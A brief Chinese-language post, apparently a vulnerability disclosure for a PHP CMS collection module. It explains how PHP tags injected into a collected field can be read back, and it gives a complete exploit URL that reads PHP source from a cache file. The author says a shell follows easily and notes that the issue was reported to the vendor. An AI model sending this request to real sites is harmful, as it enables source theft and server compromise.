后臺(tái)采集里設(shè)置采集模塊中title 或者其他的內(nèi)容都可以 設(shè)置為<?php[內(nèi)容]?>
然后用下面的代碼就可以讀取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不難了。具體如何利用看大家自己了。（別跟我說只會(huì)讀數(shù)據(jù)庫連接文件，并且還不能連），反正我是可以拿到shell。
修復(fù)：已提交給官方，等待補(bǔ)丁